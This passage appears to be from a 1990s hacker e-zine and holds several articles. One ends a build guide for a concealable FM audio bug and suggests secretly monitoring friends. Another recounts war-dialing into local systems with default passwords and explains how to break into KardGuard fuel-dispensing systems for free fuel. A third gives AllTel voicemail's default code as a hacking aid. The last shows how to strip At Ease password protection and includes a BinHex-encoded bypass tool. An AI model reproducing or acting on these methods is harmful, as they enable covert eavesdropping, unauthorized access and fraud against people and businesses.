  2765.  1- Air trimmer 2p-10p
  2766.  
  2767. Other
  2768.  2- BC 547 transistors
  2769.  1- 5 turn coil 0.5mm enameled wire
  2770.  1- electret mic insert- high sensitivity
  2771.  1- 9V battery snap
  2772.  1- 15cm tinned copper wire
  2773.  1- 30cm fine solder
  2774.  1- 170cm antenna wire
  2775.  
  2776. NOTE: use 170cm of electrical wire for the antenna, this length will give
  2777. you maximum range, however since the antenna wire needs to be extended
  2778. when bugging the concealability might be a factor. You can shorten the
  2779. wire's length but this will shorten the range yet make it easier to
  2780. conceal. Weigh the factors and do whats right for you.
  2781.  
  2782.  
  2783. ASSEMBLY OF CIRCUIT
  2784.  
  2785.         First familiarize yourself with the layout of the components.
  2786. Now the only polarized (parts that have to put around the right way) are
  2787. the two transistors, the battery and the microphone. All other parts can
  2788. be soldered either way around. I recommend using this order for assembly
  2789. as it is the most practical and easiest way to build the bug.
  2790.  
  2791.                 1.  5 surface mount resistors.
  2792.         2.  6 capacitors.
  2793.         3.  2 transistors.
  2794.         4.  air trimmer
  2795.         5.  5-turn coil.
  2796.         6.  battery snap.
  2797.         7.  microphone.
  2798.         8.  antenna wire.
  2799.  
  2800.  
  2801. READING RESISTOR AND CAPACITOR VALUES
  2802.  
  2803.         If you dont know how to read the value of a surface mount
  2804. resistor or disc ceramic capacitor read on.
  2805.  
  2806. Surface mount resistor: These have three numbers, with the first two
  2807. digits being multiplied by the third. The third digit represents how
  2808. many zeros after the first two. For example a surface mount resistor
  2809. with code 1-0-5 would mean that the first two digits (1-0) would be
  2810. multiplied by 5 zeros. To give the value 10 00000ohms or 1Mohm.
  2811.  
  2812. Capacitor: These are similar to the above but the base number is pF or
  2813. pico farads. eg a capacitor labeled 2-2-3 has the value of 22 000pF.
  2814.  
  2815.  
  2816. HOW IT WORKS
  2817.  
  2818.         The FM bug circuit consists of two stages: an audio amplifier 
  2819.     and a RF oscillator stage.
  2820.  
  2821. 1.THE AUDIO AMPLIFIER STAGE
  2822.  
  2823.         The microphone detects audio in the form of air vibrations that
  2824. enter the hole at the end of the microphone and move the diaphragm. The
  2825. diaphragm is a thin piece of metalised plastic and is charged during
  2826. manufacture. Some of these vibrations pass down a lead which touches it
  2827. to and into a FET transistor. A FET transistor has a very high input
  2828. impedance and does not have a loading effect on the charges. The audio
  2829. then gets passed through a BC 547 transistor which amplifies the sound
  2830. around seventy times. The BC547 then passes it to the base of the
  2831. oscillator stage.
  2832.  
  2833. 2.THE OSCILLATOR STAGE
  2834.  
  2835.         The 47k resistor picks up the pulse from the transistor and then
  2836. turns the second or oscillator transistor ON, but the 47k resistor has a
  2837. value so that it will not turn the transistor on fully. So the feedback
  2838. pulse from the 10p capacitor turns it ON fully.
  2839.  
  2840.         Normally a transistor is turned ON/OFF via the base, however it
  2841. can be also done by holding the base firm and differing the emitter
  2842. voltage. In the FM bug this is whats done, the 1p capacitor holds the
  2843. base firm and the 10p feedback capacitor differs the emitter voltage.
  2844. However for a capacitor to do this the emitter must have a DC voltage
  2845. that can be increased and decreased. The DC voltage is about 2V and the
  2846. base will be 0.6V higher than this so the base voltage is fixed at 2.6V
  2847. by the 1p capacitor. The voltage does not rise or fall when the
  2848. oscillator is operating only when the audio is injected into the base
  2849. via the 100n capacitor. This is how the circuit works and continues like
  2850. this at a rate of about 100 million times per second.
  2851.  
  2852.         The oscillator is designed to operate at around 100mhz, however
  2853. this figure is dependent on a lot of factors such as the 6 turn coil,
  2854. the 10p capacitor and 470R and 47k resistors also and the figure of
  2855. operation is about 90mhz (my FM bug operated at 88.5mhz). 
  2856.  
  2857.  
  2858. GETTING THE BUG READY FOR ACTION
  2859.  
  2860.         Ok so you have built the bug now and are ready to use it. Well
  2861. first of all you will need some sort of FM radio. Alright put the bug
  2862. next to or near the radio's antenna. Turn the bug and the radio on.
  2863. Alright starting from the bottom end of the radio's FM scale. Slowly
  2864. progress your way through the FM band. Usually your bug will tend to be
  2865. around the 85-95mhz range. Once you hear a beep (because your bug is
  2866. close to the radio) or any other strange static noise stop. Alright you
  2867. might have been lucky and your bug is exactly tuned already, however in
  2868. most cases you will need to adjust your bug slightly. Using a small
  2869. screwdriver slowly turn the air trimmer, whilst doing this babble out
  2870. some words, stop turning until the echo of your voice through the radio
  2871. becomes crystal clear. Your bug is now tuned and you are ready to put it
  2872. to use.
  2873.  
  2874.         You might have some problems with your bugs frequency being
  2875. exactly same as a radio stations. No problem, by compressing or
  2876. uncompressing the coil you can change your bugs frequency. Use the coil
  2877. method if your bug is in the middle of a few radio stations frequencies,
  2878. if you just need to move it up or down one or two mhz then use the air
  2879. trimmer. 
  2880.  
  2881.  
  2882. PUTTING THE BUG TO USE
  2883.  
  2884.         Many of you already have your ideas on how to use the bug.
  2885. Remember it might be illegal in your Country/State/city to use this bug
  2886. in the way you intend. Hey its up to you I dont mind, however I take no
  2887. responsibility if you get in trouble.
  2888.  
  2889.         Anyway here are a few "friendly methods":
  2890.       
  2891.         1. CHRISTMAS. Yes it will soon be that time of year again, and
  2892. this time also brings a great opportunity to discover some of those
  2893. family secrets or maybe even find out what lame presents those relatives
  2894. have brought you and save you from the disappointed face they will see
  2895. when you open it.
  2896.  
  2897.         Okay put the bug either in the pot the tree is standing in or
  2898. fasten it to a branch relatively close to the bottom of the tree. We
  2899. place it at the bottom of the tree because the antenna needs to be
  2900. extended if we want really cool range. Okay put the bug in its position
  2901. and then unravel the wire all over the tree.
  2902.  
  2903.         2. TV listening. Okay if you are out in the backyard whether it
  2904. because you want to, or there is some chore that needs to be done. You
  2905. can listen to a favorite TV show, or a basketball game or such. I know
  2906. your saying why not listen to the radio, well you now have a choice of
  2907. listening to a radio station or one of the 10000000 TV channels your
  2908. state offers you.
  2909.  
  2910.         Set the bug up about 3-5m away from the TV, then adjust the TV
  2911. volume so that it is just right to hear on your radio.
  2912.  
  2913.         3. Bug-a-friend. Okay you can bug your friend to see what he/she
  2914. is up to. Okay you will need to know where your friend goes and then
  2915. previously go there and set up the bug and your listening point. Make
  2916. sure that you set up a place where conversation happens, it is very
  2917. boring listening to insects and such.
  2918.  
  2919.         Conceal the bug anywhere within a 3-5m radius of where your
  2920. friend talks and stuff. Now conceal yourself and then sit back and
  2921. listen.
  2922.  
  2923.         Now there are a few of the more "legally friendly" methods,
  2924. there are thousands more not-so-friendly and even malicious
  2925. methods <Oooooooo> that I will leave up to your imagination.
  2926.  
  2927.  
  2928. CONCLUSION
  2929.  
  2930. I hope the information contained can help you successfully build a bug,
  2931. and then good luck using it. If you have trouble just e-mail me. If you
  2932. can not get hold of some of the components, you can order them through
  2933. me. Also if you want a bug, but dont have the electronic skill to do it,
  2934. you can buy pre-built bugs through me.. just e-mail me. may the force be
  2935. with you
  2936.  
  2937.                         Obi-1.
  2938.  
  2939. ------------------------------------------------------------------------------
  2940.  
  2941. My short time as a hacker.
  2942.  
  2943. by Kwoody
  2944.   
  2945.   I live in a small town in northern British Columbia where the city
  2946.   owns the phone company. All of BC is serviced by BCTel, except here in
  2947.   Prince Rupert. The phone company used, up until 1991, mechanical
  2948.   switches, no lie! Tech dating back to the 50's sometime. I know this
  2949.   because I know some of the workers of CityTel. (The name of the phone
  2950.   company). Because of this they were not able to offer all the goodies
  2951.   like Caller ID, Call Forward etc...and it was easy to hack then, not
  2952.   the phone company, but all the other systems in this small town of
  2953.   16000+ people.
  2954.   
  2955.   I got into hacking sort of accidently. I have had a computer and modem
  2956.   of one kind or other since about 1983. I moved here after high school
  2957.   in 1986 and found a good paying job I have worked at for the last 8
  2958.   years. One night night in 1990 I was sitting around with my roommate
  2959.   having a few beers and decided to call a buddy of ours to come over
  2960.   but I dialed the number wrong and got a computer tone. Cool I
  2961.   thought... I knew the numbers of the 2 local BBS's and that wasnt one
  2962.   of them.
  2963.   
  2964.   I fired up the computer and called it again. I got the prompt: 
  2965.    Xenix 386 Login:. 
  2966.   
  2967.   I had some knowledge of other OS's and knew this was some kind of Unix
  2968.   box. A friend of my roomie was going to university (UBC) and he
  2969.   happened to phone that night. I chatted with him for a bit and told
  2970.   him what I had found. He told me to try sysadm or root. I got in with
  2971.   sysadm, no password!
  2972.   
  2973.   I found that I had complete control of the system and it belonged to
  2974.   the local school board. I bought a book on Unix and learned as much as
  2975.   I could about the system and Unix in general. I guess being a rookie
  2976.   (read lamer?) and not knowing shit about how to cover my tracks they
  2977.   discovered the system had been hacked and shut down the dial-in. They
  2978.   went back online a few weeks later and left sysadm wide open no
  2979.   password again. I could not believe it! Even after being hacked they
  2980.   still left their system open like that.
  2981.   
  2982.   By now I was hooked and I wanted to see if there were any other
  2983.   systems in town. I could program a little in Pascal and basic (lame)
  2984.   and tried to write a dialer of some kind. No go...so instead I figured
  2985.   out the script language of Q-modem and wrote a 40 line script that
  2986.   worked. It dialed all numbers sequentially but I did not worry too
  2987.   much about being caught since the switch they used was so ancient
  2988.   because they didnt have caller ID or anything like that yet.
  2989.   
  2990.   I did not know at this time of the hacker community and some of the
  2991.   programs available that would do this already. And even if I did I
  2992.   wouldnt have known where to call and get them. At any rate I had two
  2993.   computers an XT and a 386 both with modems and two phone lines, one I
  2994.   used as my normal voice line and one for data. I setup the dialer on
  2995.   both and away I went. By the time I had finished scanning both the
  2996.   prefixes, 624 and 627, I found about 30 computers. Of those I was able
  2997.   to get into about 10. All of them used defaults and all except the one
  2998.   below were Unix boxes.
  2999.   
  3000.   Although I did find one number that connected at 1200 I think it
  3001.   belonged to the phone company. After I was connected nothing would
  3002.   happen. I tried for a while to get a prompt of some kind then suddenly
  3003.   a line of text appeared that listed two phone numbers and some other
  3004.   stuff that I cant remember. So I just left it alone for a while to see
  3005.   what came up. It soon became clear that the numbers in one column were
  3006.   always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and
  3007.   a second RCMP detachment. It looked like it recorded all calls coming
  3008.   into those 4 places.
  3009.  
  3010.   One hack I did was on a system that dispensed fuel. It was called a
  3011.   KardGuard 3000C. I knew of two places in town that had these systems.
  3012.   One was where I worked and the other was our competitor. And since I
  3013.   knew how it worked it was easy to get in. I saw their volume of fuel
  3014.   dispensed and such and could have done really nasty things like erase
  3015.   their transaction buffer or get free fuel from them. But I didnt since
  3016.   I did not see the point in hurting them or their system even if they
  3017.   were our competitor.
  3018.   
  3019.   For those of you who might find such a system I'll give a brief run
  3020.   down on it. The hardware is limited to 300 bps 7E1 and consists of a
  3021.   few things.
  3022.   
  3023.   You can tell the system as it announces it when you connect: 
  3024.   
  3025.   KardGuard 3000C Motor Fuel Dispensing System. 
  3026.   PASSWORD: 
  3027.   
  3028.   The system uses punch coded cards read by a card-reader. You have a 4
  3029.   digit security code that you need to activate the pump to dispense
  3030.   fuel. Everything is kept track of by a computer that reads the amount
  3031.   of fuel pumped, date, card number and a few other things depending on
  3032.   how the card is coded. Like odometer reading or car number.
  3033.  
  3034.   Now to get into this system via dial-in all you have to know is the
  3035.   Serial Number of the system. All of these type systems use the serial
  3036.   number as the default password to access it via dial-up. And its easy
  3037.   to get the serial number. If you know the location of the card-reader
  3038.   go and look on the side of it. Generally the actual card reader is
  3039.   housed in a metal box. On the side of the card reader itself near the
  3040.   back is a small sticker and the serial number will be written on the
  3041.   sticker. That was how I did it. I just went to their card reader and
  3042.   took the serial number off it and got in.
  3043.  
  3044.   Once in you can do any number of things. Shut off the pumps or
  3045.   manually activate them without a card and get free fuel, see how much
  3046.   of any product was dispensed. Products range from 0-15. 0 being
  3047.   regular gas, 1 regular unleaded etc. It is fairly limited of what you
  3048.   can do but you can do some nasty stuff to the company who owns it if
  3049.   you know how. A note to this all commands must be UPPERCASE. And all
  3050.   commands are one letter. Like E is for looking up the 4 digit code for
  3051.   individual cards. I dont remember all of them as we upgraded to the
  3052.   latest version of the KardGuard which supports up to 14.4k and is a
  3053.   faster system.
  3054.  
  3055.   After about 3 months of this sort of stuff I was at work one Saturday
  3056.   and got a phone call from a Constable Burke of the RCMP Special
  3057.   Investigation Unit.
  3058.   
  3059.   He informed me that he knew about my hacking and would like to take a
  3060.   look at my computers. I told him that I didnt know what he was talking
  3061.   about, he just said we could do this the hard way and he could get a
  3062.   warrant to search the place. He wanted to meet me at my place in 10
  3063.   minutes. I said ok. I was shitting bricks by this time. I phoned my
  3064.   roomie and told him to get all printouts and disks out of the house
  3065.   and take them away...anywhere. I took off home and got there to find
  3066.   my roomie gone with all printouts and disks. I fired up the computers
  3067.   and formatted both HD's. Formatting a hard drive had never taken so
  3068.   long before!!
  3069.  
  3070.   I waited for like an hour...no sign of the cops. My roomie came back
  3071.   and said where are the cops? I dont know I told him. I waited some
  3072.   more still no sign of them. I got a call about 3 hours later from a
  3073.   friend of my roomie and he asked if Constable Burke had showed up. I
  3074.   asked how he knew about that and all he did was laugh his ass off! Now
  3075.   I was thinking joke...bad joke...and it was. I managed to find out
  3076.   that this "friend" had gotten someone to pose as a police officer and
  3077.   call me to see my computers regarding hacking. Well the guy he got to
  3078.   pose as a cop did a good job at fooling me. I guess I was just over
  3079.   paranoid by this time. Plus I was really pissed as I lost a lot of
  3080.   info that I had acquired over the previous months when I formatted my
  3081.   hard drives.
  3082.   
  3083.   I guess my roommate had been telling a few people about what I was
  3084.   doing. I was more than a little pissed off at him as I had not told a
  3085.   soul of what I was doing since I knew it was illegal as hell. I got my
  3086.   disks back and burned the printouts and laid off the hacking for a few
  3087.   weeks. I started up again and was a tad more careful. I didnt keep any
  3088.   printouts and kept the info on disk to a minimum.
  3089.   
  3090.   Then about a month later my roommate, who worked for our landlord,
  3091.   came home one day and said that our landlord had been approached by
  3092.   some RCMP officer regarding me and my computers and what I might be
  3093.   doing with them. I said is this another joke? No he said, go talk to
  3094.   him yourself. I did but he wouldnt tell me much except that something
  3095.   was definitely going on regarding me, my phones and my computers. And
  3096.   the RCMP were involved.
  3097.   
  3098.   After asking around I found out that quite a few people knew what I
  3099.   had been up too. All they knew is that I was some guy who had been
  3100.   cracking systems in town. But word had spread and I still dont know
  3101.   how the cops found out or how much they knew.
  3102.   
  3103.   But after talking to my landlord I quit right there and then. I went
  3104.   home formatted the drives again, all floppies and got rid of
  3105.   everything. I had hacked my way through everything in town that I
  3106.   could in about 6 months. Also by this time CityTel had upgraded their
  3107.   switch to some of the latest tech and had Caller-ID installed along
  3108.   with all the other goodies you can get these days. It was definitely
  3109.   time to quit.
  3110.   
  3111.   Not long after I started a BBS that I still run to this day. I figured
  3112.   that was a way to kill the hacking urge and be legit. I dont live with
  3113.   that roommate anymore. I'm married now and still think about it now
  3114.   and again but have too much to lose if I do and get caught.
  3115.   
  3116.   On another note about 3 months ago I was at work and dialed a wrong
  3117.   number. As fate would have it I got a blast of modem tone in my ear.
  3118.   My old hacker curiosity came alive and I made note of the number. We
  3119.   have a small lan at work that has a modem attached and when I had a
  3120.   free moment I dialed the number up. I got the banner:
  3121.  
  3122.   city telephones. No unauthorized use. 
  3123.  
  3124.   xxxxxxx <----a bunch of numbers
  3125.   username: 
  3126.  
  3127.   I hung up right there but it was interesting to see that I had found
  3128.   CityTel's switch or something of that nature.
  3129.   
  3130.   To this day I dont know if there were any other hackers in this small
  3131.   city where I live. As far as I know I was the only one that did any of
  3132.   this sort of thing. It was fun but near the end I could feel the noose
  3133.   around my neck. And I quit while the quitting was good.
  3134.   
  3135.   Today I help admin our small lan at work with 2 servers and 8
  3136.   workstations and the Unix I learned hacking helped me when my boss
  3137.   first started to get serious about computerizing the business. Since
  3138.   then I have been able to help setup and maintain the systems we have
  3139.   today.
  3140.   
  3141.   I'll give the specs on our new KardGuard if anyone is interested as I
  3142.   know they come from the States and there must be more than a few out
  3143.   there.
  3144.   
  3145.   kwoody
  3146.  
  3147. ------------------------------------------------------------------------------
  3148.  
  3149.                           USING ALLTEL VMBs
  3150.  
  3151.                           By Leper Messiah
  3152. Ok. This is everything you need to know in hacking AllTel Mobile's
  3153. Voice Mail.  The default password on all their boxes is 9999.
  3154. Here are the docs, word for word.  Enjoy!
  3155.  
  3156. -----------------------------------------------------------------------------
  3157.  
  3158. Features
  3159. -=Basic=-
  3160. Accessing your mailbox
  3161. Changing your security code
  3162. Recording your name
  3163. Recording a personal greeting
  3164. Playing a message
  3165. Recovering deleted messages
  3166. Playback mode options
  3167.  
  3168. -=Enhanced=-
  3169. All of the Basic Features plus...
  3170. Setting up your greeting schedule
  3171. Replying to a message
  3172. Redirecting a message
  3173. Recording and sending a message
  3174. Creating a broadcast list
  3175. Personal greeting schedule
  3176.  
  3177. At a glance
  3178.  
  3179. VOICE MAIL SET UP                    Press
  3180.  
  3181. To change your security code        8 2 3
  3182. To record your name response        2 3 3
  3183. To record your personal greeting    2 2 3
  3184. To edit a greeting in your schedule 2 2 7
  3185. To activate your greeting schedule  2 2 8
  3186. To change your playback mode        8 8 3
  3187.  
  3188. SENDING AND RECEIVING MESSAGES
  3189.  
  3190. To play a message                   1
  3191. To save and play the next message   2
  3192. To reply to a message               3
  3193. To redirect a message               7
  3194. To create and send a message        3
  3195.  
  3196. Accessing your Voice Mail
  3197.  
  3198. 1.  Access your Voice Mail.
  3199.     From a cellular phone press
  3200.     # 9 9 Send.
  3201.     From a landline phone dial your
  3202.     cellular phone number, which will
  3203.     automatically transfer to your voice
  3204.     mail and press # when greeting begins.
  3205.  
  3206. 2.  Enter your security code.
  3207.  
  3208. Creating/Changing your security code
  3209.  
  3210. 1.  Access your Voice Mail.
  3211. 2.  Press 8 for Personal Options.
  3212. 3.  Press 2 3 to change your security code.
  3213.         * Note: Your security code can contain 1 to 7 digits.
  3214.  
  3215. Recording your name
  3216.  
  3217. 1.  Access your Voice Mail.
  3218. 2.  Press 2 for your Greeting Menu.
  3219. 3.  Press 3 3 to record your name.
  3220. 4.  Record your name, finish by pressing #.
  3221.     Options
  3222.     Press 3 1 to play your name.
  3223.     Press 3 3 to erase and re-record your name.
  3224.  
  3225. Recording a personal greeting
  3226.  
  3227. 1.  Access your Voice Mail.
  3228. 2.  Press 2 for Greeting Menu.
  3229. 3.  Press 2 1 to play your greeting.
  3230. 4.  Press 2 3 to record your greeting,
  3231.     record your greeting, finish by pressing #.
  3232.  
  3233. Playing a message
  3234.  
  3235. 1.  Access your Voice Mail.
  3236. 2.  Press 1 to play your messages.
  3237. 3.  Message will play.
  3238.     Options
  3239.     Press 1 to keep this message
  3240.     as new and play the next.
  3241.     Press 2 to save and play the
  3242.     next message.
  3243.     Press 3 to reply to a message.
  3244.     Press 4 4 to replay a message.
  3245.     Press 5 to erase a message.
  3246.     Press 7 to redirect the message.
  3247.  
  3248. Press 8 8 3 from the main
  3249. menu to choose a playback mode.*
  3250. Continue to press 8 3 until the
  3251. desired playback mode is selected.
  3252.  
  3253.         * Note: The system has three playback modes:
  3254.         normal, automatic, and simplified.
  3255.  
  3256. Recovering deleted messages
  3257.  
  3258. To recover a message that has been deleted: **
  3259. Press * 1 to go to the main menu,
  3260. Press * 4 to recover all deleted messages.
  3261.  
  3262.          ** Note: Deleted messages can only be recovered
  3263.          before you exit the mailbox.
  3264.  
  3265. Replying to a message
  3266. From the Play Menu:
  3267.  
  3268. 1.  Press 3 during or after a message.
  3269. 2.  Record your reply finish by pressing #.
  3270. 3.  Press 3 to continue recording a voice message.
  3271.     Press 5 to erase a message.
  3272.     Press 7 to select a special delivery option.
  3273. 4.  Press 9 to address the message.
  3274.     If sent from a subscriber's mailbox,
  3275.     the reply with be automatic.  If not, enter
  3276.     the mailbox number.
  3277.  
  3278. Redirecting a message
  3279. From the Play Menu:
  3280.  
  3281. 1.  Press 7 during or after a message.
  3282. 2.  Press 3 to continue recording a
  3283.     voice message.
  3284.     Press 5 to erase a voice comment.
  3285.     Press 7 to select a special delivery
  3286.     option.
  3287.     Press 8 to play the original message.
  3288. 3.  Press 9 to address the redirected message.
  3289.     Enter:
  3290.     a. mailbox number
  3291.     b. broadcast list number.
  3292.  
  3293. Recording and sending a message
  3294.  
  3295. 1.  Access your Voice Mail.
  3296. 2.  Press 3 to record a message.
  3297. 3.  Record your message finish by
  3298.     pressing #.
  3299.       Press 3 to continue recording a
  3300.       voice message.
  3301.         Press 4 4 to review the
  3302.           recorded message.
  3303.         Press 5 to erase a message.
  3304.         Press 7 to select a special
  3305.         delivery option.
  3306.           Press 1 to mark a message urgent.
  3307.           Press 2 to mark a message confidential.
  3308.           Press 3 to select notification of non-delivery.
  3309.           Press 4 for future delivery.
  3310.           Press 5 to delete special delivery tags.
  3311. 4.  Press 9 to address a message.
  3312.     Enter:
  3313.     mailbox number
  3314.     broadcast list
  3315.     0 + last name - 0 + first name
  3316.  
  3317. Creating or editing a broadcast list
  3318.  
  3319. 1.  Access your Voice Mail.
  3320. 2.  Press 6 to access your broadcast list.
  3321. 3.  Press 3 to create or edit a broadcast list.
  3322. 4.  Enter a one- or two-digit broadcast
  3323.     list number.  If new list, select any one-
  3324.     or two- digit number.  If editing, enter
  3325.     the one- or two- digit number assigned.
  3326. 5.  Enter all of the destinations.
  3327.     Press # after each destination entry.
  3328.     (destinations can be mailbox
  3329.     number or broadcast list numbers.)
  3330. 6.  Press 7 3 to record a name for
  3331.     your broadcast list.
  3332. 7.  Press # when finished.
  3333.  
  3334. Setting up your greeting schedule.
  3335.  
  3336. 1.  Press 2 from main menu.
  3337. 2.  Press 2 6 to select your active greeting.
  3338. 3.  Enter the greeting number you want active.
  3339. 4.  Press 2 7 to edit a greeting.
  3340. 5.  Enter the greeting number to be edited.
  3341.      Press 1 to play the current greeting.
  3342.      Press 3 to record a greeting.
  3343.      Press 5 to erase the greeting.
  3344.      Press 7 to change the time
  3345.      interval for this greeting.
  3346.      Press 8 to review the time interval
  3347.      for greeting.
  3348. 6.  Press 2 8 to activate/deactivate
  3349.     your greeting schedule.
  3350.  
  3351. Message waiting notification
  3352.  
  3353. 1.  Press 8 for Personal Options menu.
  3354. 2.  Press 6 for Notification Options.
  3355. 3.  Press 1 to play notification telephone number.
  3356.     Options
  3357.          Press 6 to enable/disable
  3358.          message notification.
  3359.  
  3360. AT ANY TIME DURING A MESSAGE             PRESS
  3361.  
  3362. To rewind by 6 seconds                   4
  3363. To rewind to the beginning of a message  4 4
  3364. To fast forward by 6 seconds             6
  3365. To fast forward to the end               6 6
  3366. of the message
  3367. To replay the date and time stamp        8 8
  3368. To stop and function                     #
  3369. To return to the main menu               * 1
  3370. -----------------------------------------------------------------------------
  3371.  
  3372. Good luck hacking.
  3373. -- Leper Messiah
  3374.  
  3375. -----------------------------------------------------------------------------
  3376.  
  3377. Hacking At Ease for the Macintosh.................. By: Ace
  3378.  
  3379. Introduction:
  3380.  
  3381.         Some educational institutions and businesses use At Ease to
  3382. discourage the pirating of programs and access to sensitive files, and
  3383. generally screwing up any fun you would have!  Wouldn't it be nice to
  3384. know how to be rid of it??
  3385.  
  3386. How to:
  3387.         Well, this will tell you how to remove the password for At Ease
  3388. so you can gain access to the Finder, and also let you change the
  3389. password to one of your chosing, really screwing some one up.
  3390.  
  3391.         First off, the computer you will need a copy of Microsoft Word
  3392. 5.1 or 6.0  (Norton Utilities Disk Editor will also work,  and I'm
  3393. trying my best to find other programs that will allow you to do this).
  3394. Launch Microsoft Word and go to the "File" menu,  and select "Open".
  3395. Now change the "File Type" to "All Files".  Navigate to the Preferences
  3396. folder and open At Ease Preferences. It should look like a giant mess.
  3397. Somewhere in there is the password.  It doesn't really matter where.
  3398. Select all of the text with Command-A and press the delete key,  and
  3399. save the now empty file.  Restart the computer.  Now you can select "Go
  3400. to finder" from At Ease's menu.
  3401.  
  3402. Other Programs:
  3403.  
  3404.         You can also use the following program called DisEase. There is
  3405. also a HyperCard stack that will bypass At Ease.  I have used them both,
  3406. although I feel that using the above method is better.
  3407.  
  3408.             ___
  3409.           /  _  \
  3410.          /  / \  \
  3411.         /  /___\  \ce
  3412.        /  _______  \
  3413.       /  /       \  \
  3414.  
  3415.  
  3416. (This file must be converted with BinHex 4.0)
  3417.  
  3418. :#d4TFd9KFf8ZFfPd!&0*9%46593K!3!!!#iE!!!!!"Dd8dP8)3!"!!!Z'h*-BA8
  3419. #r`!!!"Err`d!"d4TFd9KFf8!!kB8!0phS!!4QKS!!!#!!!!!!!$RQdl"G!!!!!!
  3420. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!rrrrrd&38%a&390&)3#SX5K#U,)ak!!!Ah8
  3421. !!!!!!!!YP3!!!!"j!`!!!!!!!!!!E$d1!&h(r2bZe8l@f@95I#BhbSpfRTQlBe[
  3422. GZRV*IQ9bSprES-Z&df[JCqmPT`0qRTYYSl9`F1ZHk'ffA-rG'BYZdmh@@Mc22B!
  3423. l$RR#(H@AF$pG#19#YJrZK,aL9`cbK5mm9V&0&mVGP(YHjbP3A8F[Z9m'0cbI,(Q
  3424. Jj1#41AcbN!$F3JD3!"')6q"h8PH-5Bba$`mcGJrH[PeSiT&&LDFRr84p'`Y1"`T
  3425. H-XZcQpSAV@Z[edU,Si45[DkYBqA5Q[!%i(X6Pji[IrK2h%jY*r0,JZVrURhm)I@
  3426. qG&NM4TfhhhBBFab8MT2Mj1"e831I@rZ*c4c'@MUhEVe8CEXkHc@(bj86S%Hrf3*
  3427. rjKa@cE)V9cXCUl&Nh[Lqp1D+fXC%G*kcE'qcNdVel4TMFPE#fE3J-Ijj6&9JDM'
  3428. ImQ&U!&1I5eGcj-m4HZ9cqB%2e6UCb[XU1cpPE`2c,BXHU'rTB!`-Kl3@PM0[%`X
  3429. i)kK8Cf`HZ$K$U#UFi95,-p6U2pELR&R)H$f%HJce@EFHAXM5KdU+@3ja*E6HQiR
  3430. Pam'bE9dMP!6$-HY3Vk%"imJ6M6Q%e9Y3&k!khCjU(YpEq9cfTV9lA'f@YL5hYA4
  3431. `E8Vb#j[(pjANpqSPqCA2qDhL6rG'#QXV1bYA-jC66+jTr#hV8+#B69rDYj!!pGj
  3432. 49$[q#0ImNI6Q"EAMZphH&[3qZA!HIqqZI-jhSq$k@'TGbmDYpAI@lh#Y3%TP"1H
  3433. FHBb02l'kcfE[6cJ1&#J!Ef"qdYjQEZKSHQ"G"pN@H+`#hS%[8CAN3(e@q9cZPk(
  3434. TdbAPL)*ZG)p3PbC4IaV[ahSrC68Z,'IGm-6(hlH65H02eA!p2V1L[ReECpZ'qN9
  3435. YEG[D`1iVl(#UQ4hZI5Yr(P"k'Qk`EPPBlMMNQ'Mcq*-P1GDKG0hlDXGheJ9l[c%
  3436. jfpY+-aacC`0Mhih1'pqERf!jkaPl,RQHpIh`,CP9rN"N!r#kHqI#(`m"j5'ipI%
  3437. YM2hqQN4MpHDX&BR0UqYb9L8f-rC`AG`k4(Lp(rSI(T1HAEZRVJ+6F-$i!I6ZF([
  3438. $k-9)*HVhIVeZ$[!1Y$TpmmEr'AQimVQ-!B3!DRpG,["BR4qp64AcaTpUC*Q4bNl
  3439. RV*2#qaKr[q'FGXj8VXi-Pq4E,FjB&)N#$ImF'[kBkhCX`Fk"!@HB9fGj0E*Jjk2
  3440. h1ZFAl0bpfaRM9FBk"$IZXJkPYMY1lml#@UZapaR5)G@5'8Ph`2Zc5[,6l4bPqh"
  3441. q8DdcC+hK#,,@l!ceh&U5MdNC$Xm!F4MDIURh-kQY,&!bcaNk2$29l!`I"S2HAHL
  3442. FVh`Zkd[hlUR,KDrEJ$M@qpRm&LBjB`f$32KGcZFfMSZ8"2[fe(B@6Up(G90k3pd
  3443. F9j&jQGFA3QPdahSA@ifmrLDPZm!85B8N[DZqTG0XEGf+U+,%j1l)hj),Cf5*h(%
  3444. 6MA!@0a(-"-i@hCq3!+6'i1BE9L5fA!Zfm',Qm4SS*hV1NCSpm-RmLcPDHpH1@Q,
  3445. L*RlUCllCFeTBS,#&j6r%SQTMhCElILI4Q,0jlGV%jTUkk"qICR,$XT+mG(Y*AUq
  3446. HfM,K&kiiCPbr6(ZJq&1pN6SG161AjA,2c#d[L'CY#5#Pj,TFfPfLcc2T)HRp5jL
  3447. kl+Hcqk"*"m[re-S1E)Z3!,8$#abc[T)j6AZ$-e55rb'H"V`DiGAj$e%Q$(f)dZ!
  3448. -ViBVJ0I)T$2D[-cT)dqcR!BQ[8(FZIY1TpXVjQ@HET`MNZ0`[TFC&iDdjXcT&$D
  3449. TN[c$-r(1J@0QHM23mh2TJeCMqP(+#1`(mpP59%[Br[3KGf13!+6T5)L(A$C2%XZ
  3450. D2BeCB(lfm#aJ202+![1!4,[%Pi"b9#3$9i1m-B3YDI(D2@jU#*Bl1-[Gll#%Jl0
  3451. QZbc,rcG,hmR,,$F`UMiRVEh)-JrZrCTJHIl(rj8PI#6p*jlE2ClN0BRe2ZpjlI`
  3452. M,[0E1229dYhT3eSq'1D8j00NqLaa5Mm+[ckEDXimRck,DJ$GiiF,h*QAq-b2d$f
  3453. *Q@+ifmh1[DYD0f,$Ueh9dY(8XE9qBkR)Y*(8cl,C(GM!bl&[4jHBTc+I[bhR8pM
  3454. $Si[08mkpa6Pld)0Z)`ZR4E2hEXml[*!!4DGP*D50U,1c%Z`T-C-qa"8fV%2B1B#
  3455. 'A2Ka5EQ'J`AD3+aE8YXPGRK48@hQ0&*[%Z29+aLp)F)3EKKpJ()*Q`T9"FX'f8R
  3456. R0#Rjk@4E2C4Fdp5bFGZ$3X@KNQahhmm&,h",hfrG![A"%5lj5N8"FLm)(YqiiTU
  3457. k"`LYYbd+V#2BqaYbd6Q2cYR'HbmcZ,%LZf(fVcNm*0AGGJQViBD+l-CVIqh5KpJ
  3458. mm(@'V9Yk1i$c-($8Aq-)9Gl9X""Ek*'E@(ifNaU3!,dmNrbdNIYZUX0@a[[6H*p
  3459. hiE!hm$k&pmrG$IeKE1L2)X%C1cl"lLA"M[fTUqil'I,I(5)B6$RN(3l[1)4M[H1
